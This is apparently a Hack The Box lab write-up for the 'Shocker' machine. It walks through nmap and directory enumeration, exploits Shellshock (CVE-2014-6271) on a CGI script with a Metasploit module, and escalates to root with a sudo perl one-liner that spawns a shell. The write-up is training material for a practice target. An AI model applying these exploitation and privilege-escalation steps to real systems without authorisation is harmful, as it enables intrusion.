This is the first HTB Write-up on the road to OSCP.
Box creator: mrb3n.
Shocker Box is a retired Easy-rated Linux Machine, who deals with Apache mod_cgi — ‘Shell-shock’ Remote Command Injection Exploit, which can be done using msf or the python script here https://www.exploit-db.com/exploits/34900.
Initial Enumeration:
echo ‘10.10.10.57 shocker.htb’ >> /etc/hosts
export IP=shocker.htb
nmap -sC -vv -sV -nP -O -A -oN nmap_scan.txt $IP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Seems like we got two open ports -
80/tcp running Apache httpd 2.4.18
2222/tcp
Visiting the website:
Seems like we’ve got a single bug.jpg, showing some kind of Bug with hammer above its head. A quick check before moving forward is to check 2 relevant things -
1. Steganography — Trying to extract as many info as possible from the bug.jpg when trying to do so it seems that we didn’t discover anything that could provide us with interesting info.
2. https://tineye.com — Trying to see whether this bug.jpg will shows up in other places, such as security blogs or CVE sites etc.
Going through the result in Tineye, we get the following —
It looks like that this bug.jpg is referred to as “bashbug”, a quick search revealed the following exploit — CVE-2014–6271
https://medium.com/@nikhilh20/exploit-bash-shellshock-part-1-ad1636acaf9e
The cause of the vulnerability lies in a loophole in the Bash algorithm which parses the values of environment variables. According to CVE-2014–6271, the vulnerable Bash version “processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment”.
Main Enumeration:
In this stage I’ve used various tools -
1. dirb
2. dirbuster
3. gobuster
4. wfuzz
5. dirsearch
Note: The relevant file we will soon discover, can be found using any of these tools with the proper flags and modification.
##dirb:
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:14)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)##dirsearch:
[05:14:56] Starting:
[05:15:04] 403 - 300B - /.htaccess.bak1
[05:15:04] 403 - 300B - /.htaccess.orig
[05:15:04] 403 - 302B - /.htaccess.sample
[05:15:04] 403 - 300B - /.htaccess.save
[05:15:04] 403 - 298B - /.htaccessBAK
[05:15:04] 403 - 298B - /.htaccessOLD
[05:15:04] 403 - 299B - /.htaccessOLD2
[05:15:04] 403 - 291B - /.html
[05:15:04] 403 - 290B - /.htm
[05:15:04] 403 - 297B - /.httr-oauth
[05:15:42] 403 - 294B - /cgi-bin/
[05:15:56] 200 - 137B - /index.html
[05:16:16] 403 - 299B - /server-status
[05:16:16] 403 - 300B - /server-status/##gobuster 2nd run:
root@kali:/home/czar/Downloads# gobuster dir -u http://shocker.htb/cgi-bin/ -t 80 -w /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://shocker.htb/cgi-bin/
[+] Threads: 80
[+] Wordlist: /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,sh
[+] Timeout: 10s
===============================================================
2020/11/28 08:23:39 Starting gobuster
===============================================================
/user.sh (Status: 200)
Progress: 2076 / 220561 (0.94%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/28 08:23:58 Finished
===============================================================
We can see that have found user.sh (http://shocker.htb/cgi-bin/user.sh) which is what we looking for.
Metasploit:
we are going to use multi/http/apache_mod_cgi_bash_env_exec —
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets CGI scripts in the Apache web server by setting the
HTTP_USER_AGENT environment variable to a malicious function
definition.
We will need to change the TARGETURI to be set to /cgi-bin/user.sh
spawn a shell using python3, and we’ve got our self a shell via user named ‘shelly’.
Getting User
So not much of an issue here, shelly can grab the user in /home/shelly.
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
44d**************************bb4
shelly@Shocker:/home/shelly$
Privilege Escalation
Learning from other boxes, I though I should upload an enum script or two, and see whether there are interesting finding, but the very first command saved me all of that.
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
It seems shelly is able to run perl with sudo privilage. A quick jump to GTOF will tell us that if shelly use the command -
sudo perl -e ‘exec “/bin/sh”;’
she will gain root priviliages, so that’s what I did.
shelly@Shocker:/home/shelly$ sudo perl -e ‘exec “/bin/sh”;’
# whoami && id
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
4fb5************************ad55
Manuel Exploitation:
The same process can be done using the following python script -